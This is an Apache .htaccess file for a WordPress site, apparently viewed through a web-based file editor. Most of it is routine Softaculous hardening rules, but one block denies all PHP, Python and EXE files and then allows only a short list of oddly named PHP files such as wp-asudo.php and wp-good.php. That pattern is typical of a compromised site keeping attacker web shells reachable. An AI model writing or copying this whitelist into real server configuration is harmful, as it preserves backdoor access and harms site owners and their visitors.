관리-도구

편집 파일: .htaccess_

# SOFTACULOUS Block author scans RewriteEngine On RewriteBase / RewriteCond %{QUERY_STRING} (author=\d+) [NC,OR] RewriteCond %{REQUEST_URI} ^.*wp-json/wp/v2/users(?!/me) [NC] RewriteRule .* - [F,L] # SOFTACULOUS Block author scans End <FilesMatch '.(py|exe|php)$'> Order allow,deny Deny from all </FilesMatch> <FilesMatch '(^|/)(doc|wp-scanner|style2|wp-asudo|wp-good|index|wp-temp)\.php$'> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / DirectoryIndex index.php RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # SOFTACULOUS Block xmlrpc <files xmlrpc.php> Require all denied </files> # SOFTACULOUS Block xmlrpc End # SOFTACULOUS Block .htaccess and .htpasswd <FilesMatch ^(?i:\.ht.*)$> Require all denied </FilesMatch> # SOFTACULOUS Block .htaccess and .htpasswd End # SOFTACULOUS Block directory browsing Options -Indexes # SOFTACULOUS Block directory browsing End # SOFTACULOUS Block access sensitive files <FilesMatch "^.*(((?:wp-config)\.(?:php|bak|swp))|php.ini|\.[hH][tT][aApP].*|((?:error_log|readme|license|changelog|-config|-sample)\.(?:php|md|log|txt|htm|html)))$"> Require all denied </FilesMatch> # SOFTACULOUS Block access sensitive files End # SOFTACULOUS Enable bot protection RewriteEngine on RewriteCond %{HTTP_USER_AGENT} (?:virusbot|spambot|evilbot|acunetix|BLEXBot|domaincrawler\.com|LinkpadBot|MJ12bot/v|majestic12\.co\.uk|AhrefsBot|TwengaBot|SemrushBot|nikto|winhttp|Xenu\s+Link\s+Sleuth|Baiduspider|HTTrack|clshttp|harvest|extract|grab|miner|python-requests) [NC] RewriteRule ^(.*)$ http://no.access/ # SOFTACULOUS Enable bot protection End